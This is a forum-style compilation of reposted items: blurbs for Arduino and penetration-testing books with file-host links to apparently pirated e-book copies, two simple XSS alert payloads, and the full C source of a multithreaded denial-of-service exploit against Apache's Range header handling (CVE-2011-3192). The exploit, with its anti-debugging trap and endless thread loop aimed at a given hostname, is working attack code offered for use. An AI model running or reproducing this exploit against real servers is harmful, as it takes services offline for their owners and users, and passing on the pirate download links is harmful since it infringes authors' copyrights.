[h=2]Beginning Arduino Programming[/h] [h=3]Book Description[/h] Beginning Arduino Programming provides a clear introduction to writing Arduino code, building your skills with Arduino through a series of well-designed hardware and software building blocks. Once you have read this book, you’ll be ready to program Arduino in exactly the ways you want for your future projects. Beginning Arduino Programming lets you discover new journeys with your Arduino board through programming. While everyone knows that Arduino is a platform for hardware hackers—be they engineers, artist or maker-enthusiasts—your Arduino board cannot function without code. This book will show you the fundamentals of programming and how to program your Arduino board to do the things you want it to do. You’ll learn from first principles the core Arduino programming language, examining how to program loops, variables, arrays, and functions. While these features are common to many languages, you’ll also learn how they are used specifically for Arduino. Beginning Arduino Programming uses the sketching analogy, which means you’ll find yourself writing snippets of code that do interesting things very quickly. You’ll also learn how to code in a good, succinct Arduino style that other programmers will respect. As you read Beginning Arduino Programming, you’ll learn how to make your Arduino code talk directly to the chips and sensors on your boards, taking into account pulse width, timing and sensor characteristics, all under your control. You’ll then be ready to discover the joys of the existing Arduino open source libraries, so you can benefit from the code that other people have already created, and even think about sharing your own Arduino code projects in the future. What you’ll learn Start programming quickly with Arduino sketches Get up to speed with the Arduino programming language Write code that interacts with devices such as sensors and motors How to code around pulse widths, timing and sensor characteristics Work with time delays in your Arduino coding projects Write your own, new Arduino functions Write concise and well-written code that other programmers will respect Use existing Arduino libraries, and create new ones! Who this book is for This book is for all Arduino board users who want to learn to program the Arduino board, regardless of hardware version or which devices are connected to the board. You do not need to have programmed before, but if you have, then you’ll learn how to apply core coding features in the Arduino context. Table of Contents Getting Started Sketching in Code Working With Variables Making Decisions Digital Ins and Outs Analog in, Analog out Functions, Time, and Interrupts Arrays for Arduino Writing New Functions for Arduino Arduino Libraries Arduino Hardware 10 Where to Go from Here? Appendix A: Common Circuits Appendix B: Arduino Math [h=3]Book Details[/h] Paperback: 272 pages Publisher: Apress (October 2011) Language: English ISBN-10: 1430237775 ISBN-13: 978-1430237778 File Size: 39.3 MiB [h=3]E-Book[/h] [FilePost] Apress.Beginning.Arduino.Programming.Oct.2011.rar [FileJungle] Apress.Beginning.Arduino.Programming.Oct.2011.rar [h=3]Paper Book[/h] [Amazon] Beginning Arduino Programming Sursa: Beginning Arduino Programming | Wow! eBook - Blog
-
[h=2]Arduino Robotics[/h] [h=3]Book Description[/h] This book will show you how to use your Arduino to control a variety of different robots, while providing step-by-step instructions on the entire robot building process. You’ll learn Arduino basics as well as the characteristics of different types of motors used in robotics. You also discover controller methods and failsafe methods, and learn how to apply them to your project. The book starts with basic robots and moves into more complex projects, including a GPS-enabled robot, a robotic lawn mower, a fighting bot, and even a DIY Segway-clone. Introduction to the Arduino and other components needed for robotics Learn how to build motor controllers Build bots from simple line-following and bump-sensor bots to more complex robots that can mow your lawn, do battle, or even take you for a ride What you’ll learn Basics of motor-control Basics of PCB design and fabrication R/C control and decoding Autonomous sensor guidance Frame building from various materials Instructions for a variety of robot designs Who this book is for Electronics and robotics hobbyists and DIY builders. Table of Contents The Basics Arduino for Robotics Let’s Get Moving Linus the Line-Bot Wally the Wall-Bot Making PCBs The Bug-Bot Explorer-Bot RoboBoat Lawn-Bot 400 The Seg-Bot The Battle-Bot Alternate Control [h=3]Book Details[/h] Paperback: 628 pages Publisher: Apress (July 2011) Language: English ISBN-10: 1430231831 ISBN-13: 978-1430231837 File Size: 42.2 MiB [h=3]E-Book[/h] [FilePost] Apress.Arduino.Robotics.Jul.2011.rar [FileJungle] Apress.Arduino.Robotics.Jul.2011.rar [h=3]Paper Book[/h] [Amazon] Arduino Robotics Sursa: Arduino Robotics | Wow! eBook - Blog
-
Apache HTTP Server Denial of Service /* * This is a reverse engineered version of the exploit for CVE-2011-3192 made * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz). * Copyright 2011 Ramon de C Valle <rcvalle@redhat.com> * * Compile with the following command: * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ptrace.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <unistd.h> #include <pthread.h> void ptrace_trap(void) __attribute__ ((constructor)); void ptrace_trap(void) { if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) { write(fileno(stdout), "Segmentation fault\n", 19); exit(-1); } } void w4rn41dun14mu(int attr, int fg, int bg) { char command[13]; sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40); printf("%s", command); } void banner() { w4rn41dun14mu(0, 1, 0); fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1, stdout); } void gime_er_mas() { printf("%c%s", 0x1b, "[2J"); printf("%c%s", 0x1b, "[1;1H"); puts("\nsorry dude there's an error..."); } struct thread_info { pthread_t thread_id; int thread_num; char *argv_string; }; static void * thread_start(void *arg) { struct thread_info *tinfo = (struct thread_info *) arg; char hostname[64]; int j; strcpy(hostname, tinfo->argv_string); j = 0; while (j != 10) { struct addrinfo hints; struct addrinfo *result, *rp; int sfd, s; ssize_t nwritten; memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_flags = 0; hints.ai_protocol = 0; s = getaddrinfo(hostname, "http", &hints, &result); if (s != 0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s)); exit(EXIT_FAILURE); } for (rp = result; rp != NULL; rp = rp->ai_next) { sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (sfd == -1) continue; if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1) close(sfd); } if (result != NULL) freeaddrinfo(result); nwritten = write(sfd, "HEAD / HTTP/1.1\n" "Host:localhost\n" "Range:bytes=0-,0-\n" "Accept-Encoding: gzip", 71); if (nwritten == -1) close(sfd); usleep(300000); j++; } return 0; } int main(int argc, char *argv[]) { int i; struct thread_info tinfo; banner(); if (argc <= 1) { w4rn41dun14mu(0, 2, 0); fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout); return 0; } w4rn41dun14mu(0, 3, 0); printf("[+] Attacking %s please wait in minutes ...\n", argv[1]); while (1) { i = 0; while (i != 50) { tinfo.thread_num = i; tinfo.argv_string = argv[1]; pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo); usleep(500000); i++; } } } Sursa: Apache HTTP Server Denial of Service
-
<script>alert(1)</script> <img src="" onerror="alert(123)" />
-
[h=2]Penetration Tester’s Open Source Toolkit, 3rd Edition[/h] [h=3]Book Description[/h] Great commercial penetration testing tools can be very expensive and sometimes hard to use or of questionable accuracy. This book helps solve both of these problems. The open source, no-cost penetration testing tools presented do a great job and can be modified by the user for each situation. Many tools, even ones that cost thousands of dollars, do not come with any type of instruction on how and in which situations the penetration tester can best use them. Penetration Tester’s Open Source Toolkit, Third Edition, expands upon existing instructions so that a professional can get the most accurate and in-depth test results possible. Real-life scenarios are a major focus so that the reader knows which tool to use and how to use it for a variety of situations. Details current open source penetration testing tools Presents core technologies for each type of testing and the best tools for the job New to this edition: Enterprise application testing, client-side attacks and updates on Metasploit and Backtrack Review “Jeremy Faircloth continues to write about computer and network security in ways that help the InfoSec community. In Penetration Tester’s Open Source Toolkit, Third Edition he combines his sharp insight into a wide variety of technologies, diverse penetration testing approaches and several penetration testing tools (then showcases these tools in action in the case study in each chapter) so the student of penetration testing can go out and get it done. This is just the kind of writing we should be expecting from our front runners in IT to be doing to support our Enterprise.” –Tim Hoffman, President, Alida Connection “All in all Penetration Tester’s Open Source Toolkit is a good read. Clear, concise and made me want to put to work the knowledge I had learnt at the end of each chapter so that I could say, yes I do understand how that works and how to use it in future tests.” –review on Hakin9.org [h=3]Book Details[/h] Paperback: 464 pages Publisher: Syngress; 3rd Edition (August 2011) Language: English ISBN-10: 1597496278 ISBN-13: 978-1597496278 File Size: 26.4 MiB [h=3]E-Book[/h] [FilePost] Syngress.Penetration.Testers.Open.Source.Toolkit.3rd.Edition.Aug.2011.rar [FileJungle] Syngress.Penetration.Testers.Open.Source.Toolkit.3rd.Edition.Aug.2011.rar [h=3]Paper Book[/h] [Amazon] Penetration Tester’s Open Source Toolkit, 3rd Edition Sursa: Penetration Tester’s Open Source Toolkit, 3rd Edition | Wow! eBook - Blog